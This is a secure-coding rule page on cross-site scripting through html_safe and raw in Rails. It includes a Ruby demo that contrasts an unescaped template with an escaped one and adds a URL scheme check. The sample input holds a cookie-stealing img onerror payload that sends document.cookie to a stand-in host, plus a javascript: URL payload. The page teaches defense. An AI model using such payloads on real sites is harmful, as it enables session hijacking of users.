Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
| Property | Value |
|---|---|
| Language | |
| Severity | |
| CWE | CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) |
| OWASP | A07:2017 - Cross-Site Scripting (XSS) |
| Confidence Level | Low |
| Impact Level | Medium |
| Likelihood Level | Low |
Description
Calling ‘html_safe’ on a string in Ruby on Rails marks it as trusted markup (it returns an ActiveSupport::SafeBuffer), so the view layer renders it verbatim instead of HTML-escaping it. If the string contains data that comes from users or other external sources, that data reaches the browser unescaped and can carry script. The ‘raw’ helper and the ‘<%==’ ERB tag have the same effect and deserve the same scrutiny. Because a static rule cannot tell whether the string is attacker-controlled, the finding is reported at low confidence; confirm it by tracing where the value originates.
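The unsafe and the escaped rendering side by side, as an added example that is not code from this page or from the Rails project. It uses only Ruby's standard library: plain ERB never escapes ‘<%= %>’, so the first template behaves like a Rails view that has called html_safe on every value. The attacker strings are constructed sample input, and the templates, render_vulnerable, render_safe and safe_href are assumptions made for the demonstration.

```ruby
require "erb"
require "uri"

# Constructed sample input standing in for attacker-controlled profile fields.
ATTACKER_NAME = %q(<img src=x onerror="document.location='https://evil.example/?c='+document.cookie">)
ATTACKER_URL  = "javascript:alert(document.domain)"

# Vulnerable pattern. Plain ERB never escapes `<%= %>`, so this template
# behaves like a Rails view that wrote `<%= name.html_safe %>` or
# `<%= raw name %>`: whatever is in the variables lands in the HTML verbatim.
VULNERABLE_TEMPLATE = ERB.new(<<~'TEMPLATE')
  <p>Welcome, <%= name %></p>
  <a href="<%= homepage %>">homepage</a>
TEMPLATE

def render_vulnerable(name:, homepage:)
  VULNERABLE_TEMPLATE.result(binding)
end

# Only absolute http(s) URLs are allowed into href; anything else
# (javascript:, data:, vbscript:, unparsable input) collapses to "#".
# HTML-escaping alone would not stop a javascript: URL, because it contains
# none of the characters escaping touches. Relative paths are rejected too;
# extend the allow list if the application needs them.
def safe_href(url)
  uri = URI.parse(url.to_s)
  return "#" unless %w[http https].include?(uri.scheme.to_s.downcase)
  url.to_s
rescue URI::InvalidURIError
  "#"
end

# Hardened pattern. Every interpolated value is HTML-escaped, and the URL
# attribute is additionally scheme-checked. Escaping is what Rails does by
# default when html_safe/raw are not used.
SAFE_TEMPLATE = ERB.new(<<~'TEMPLATE')
  <p>Welcome, <%= ERB::Util.html_escape(name) %></p>
  <a href="<%= ERB::Util.html_escape(safe_href(homepage)) %>">homepage</a>
TEMPLATE

def render_safe(name:, homepage:)
  SAFE_TEMPLATE.result(binding)
end

if __FILE__ == $PROGRAM_NAME
  puts "--- vulnerable ---", render_vulnerable(name: ATTACKER_NAME, homepage: ATTACKER_URL)
  puts "--- hardened ---",   render_safe(name: ATTACKER_NAME, homepage: ATTACKER_URL)
end
```

In a Rails view the remedy is the same: leave the default escaping on, or escape each piece with ERB::Util.html_escape before assembling markup and only then call html_safe on the result; the tag, content_tag and safe_join helpers do this for you. Escaping does not make a URL attribute safe by itself, which is why safe_href rejects every scheme other than http and https.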
Impact
If exploited, an attacker can inject script into pages your application serves (stored or reflected Cross-Site Scripting) and run it in other users' browsers under your site's origin. Such script can read what the page displays, act as the victim against your own endpoints, steal session tokens that are not protected by the HttpOnly flag, or deface the page. This can lead to data breaches, loss of user trust, and regulatory or reputational consequences for your organization.